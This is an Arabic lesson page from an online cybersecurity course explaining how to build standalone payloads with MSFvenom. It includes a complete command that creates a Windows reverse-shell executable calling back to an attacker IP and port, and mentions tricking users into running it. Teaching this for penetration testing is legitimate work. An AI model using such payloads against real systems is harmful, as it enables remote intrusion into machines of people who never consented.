العودة إلى الدورة

إنشاء الـ Reverse Shells باستخدام MSFvenom (أداة)

احتراف الأمن السيبراني: من الصفر إلى الاحتراف

MSFvenom: إنشاء الـ Payloads المستقلة

بينما يتعامل Metasploit مع الـ payloads تلقائياً أثناء الاستغلال، قد تحتاج أحياناً إلى إنشاء ملف تنفيذي خبيث مستقل (مثلاً لخداع مستخدم للنقر عليه، أو رفعه عبر ثغرة رفع ملفات).

MSFvenom هو مزيج من منشئ الـ payloads‏ (msfpayload) والمشفِّر (msfencode).

المعلمات الرئيسية

  • -p: تحديد الـ payload (مثلاً linux/x86/shell_reverse_tcp).
  • LHOST و LPORT: عنوان IP ومنفذ المهاجم.
  • -f: تنسيق المخرج (مثلاً exe, elf, raw).
  • -o: اسم ملف المخرج.

مثال: إنشاء Reverse Shell لنظام Windows

bash msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/Documents/shell.exe

مهمة: بعد إنشاء هذا الـ payload، يجب عليك إعداد مستمع (listener) مقابل (باستخدام netcat أو multi/handler في Metasploit) لاستقبال الاتصال عندما ينفذ الهدف الملف.